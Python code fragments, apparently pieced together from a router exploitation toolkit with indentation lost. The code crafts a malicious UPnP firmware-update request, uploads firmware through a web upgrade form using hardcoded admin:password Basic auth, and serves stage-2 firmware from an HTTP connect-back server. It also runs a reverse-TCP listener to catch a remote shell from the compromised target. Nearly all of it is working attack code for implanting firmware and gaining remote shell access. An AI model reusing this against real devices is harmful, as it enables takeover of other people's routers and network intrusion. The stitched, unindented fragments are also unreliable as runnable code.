def main(firmware_file=None):
logger = Logging(max_level=Logging.DEBUG)
request = SetFirmwareRequest(firmware_file=firmware_file, logger=logger)
#write out the request to a file so we can easily analyze what we sent.
logger.LOG_DEBUG("Writing request to request.bin for analysis.")
open("./request.bin", "wb").write(str(request))
logger.LOG_DEBUG("Done.")
logger.LOG_INFO("Sending special UPnP request to host: %s" % HOST)
special_upnp_send(HOST, 5000, str(request))
logger.LOG_INFO("Done.")
def __init__(self,firmware_file=None,logger=None):
b64encode=True
if not logger:
logger=Logging(max_level=Logging.DEBUG)
if firmware_file:
logger.LOG_INFO("Reading firmware data from: %s" % firmware_file)
firmware_data=open(firmware_file,"rb").read()
else:
b64encode=False
logger.LOG_INFO("Generating padding of As in place of firmware data.")
firmware_data="A"*self.MIN_CONTENT_LENGTH
self.request_body=SetFirmwareBody(firmware_data,b64encode=b64encode,logger=logger)
self.request_headers=SetFirmwareRequestHeaders(self.MIN_CONTENT_LENGTH)
def send_fw(url,fw_file):
logger=Logging(max_level=Logging.DEBUG)
logger.LOG_INFO("Sending %s" % fw_file)
logger.LOG_INFO("to %s" % url)
fw_file_basename=os.path.basename(fw_file)
logger.LOG_INFO("Creating headers.")
headers={"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}
headers["Accept-Language"]="en-US,en;q=0.5"
headers["Accept-Encoding"]="gzip, deflate"
headers["Referer"]="http://192.168.127.141/UPG_upgrade.htm"
#admin:password
headers["Authorization"]="Basic YWRtaW46cGFzc3dvcmQ="
headers["Connection"]="keep-alive"
logger.LOG_INFO("Creating post data")
mf=MultipartForm()
mf.add_field("buttonHit","Upgrade")
mf.add_field("buttonValue","Upload")
mf.add_field("IS_check_upgrade","0")
mf.add_field("ver_check_enable","1")
mf.add_file("mtenFWUpload",fw_file)
mf.add_field("upfile",fw_file_basename)
mf.add_field("Upgrade","Upload")
mf.add_field("progress","")
post_data=str(mf)
headers["Content-Length"]=("%s" % len(post_data))
headers["Content-Type"]=mf.get_content_type()
client=HttpClient()
logger.LOG_INFO("Sending request.")
resp=client.send(url,headers=headers,post_data=post_data)
return resp
def main(stage1,stage2,docroot):
logger=Logging(max_level=Logging.DEBUG)
"""
Start servers
"""
try:
logger.LOG_INFO("Starting HTTP connect-back server.")
httpd,http_pid=do_http_connectback([stage2],HTTP_PORT,docroot,logger)
logger.LOG_INFO("HTTP server started.")
except Exception as e:
print e
sys.exit(1)
try:
logger.LOG_INFO("Starting reverse-tcp server.")
connect_back,cb_pid=do_tcp_connectback(CONNECTBACK_PORT,logger)
logger.LOG_INFO("Reverse-tcp server started.")
except Exception as e:
print e
httpd.shutdown()
sys.exit(1)
"""
Exploit UPnP
"""
try:
logger.LOG_DEBUG("Instantiating UPnP firmware exploit.")
exploit=UPNPFirmwareExploit(TARGET,UPNP_PORT,stage1,logger=logger)
logger.LOG_INFO("Sending stage 1 firmware.")
exploit.send()
logger.LOG_INFO("Done with stage 1 firmware.")
except Exception as e:
print e
traceback.print_exc()
httpd.shutdown()
connect_back.shutdown()
raise e
sys.exit(1)
"""
Wait for servers to finish.
"""
logger.LOG_INFO("Serving stage 2 firmware.")
try:
logger.LOG_INFO("Waiting for server to terminate. PID: %d" % http_pid)
httpd.wait()
except Exception as e:
logger.LOG_WARN("Error with HTTP server: %s" % str(e))
connect_back.shutdown()
httpd.shutdown()
#not sure if this is fatal or not.
#We probably killed with ctrl+c
sys.exit(1)
logger.LOG_INFO("HTTP server terminated.")
logger.LOG_INFO("Done serving with stage 2 firmware.")
logger.LOG_INFO("Waiting for incoming remote shell.")
try:
logger.LOG_INFO("Waiting for reverse-tcp server to terminate.")
connect_back.wait()
except Exception as e:
#pretty sure this happens when we ctrl+c during a reverse-tcp shell.
logger.LOG_INFO("Shutting down reverse-tcp server.")
connect_back.shutdown()
httpd.shutdown()
logger.LOG_INFO("Exploitation of %s complete." % TARGET)
httpd.shutdown()
connect_back.shutdown()
sys.exit(0)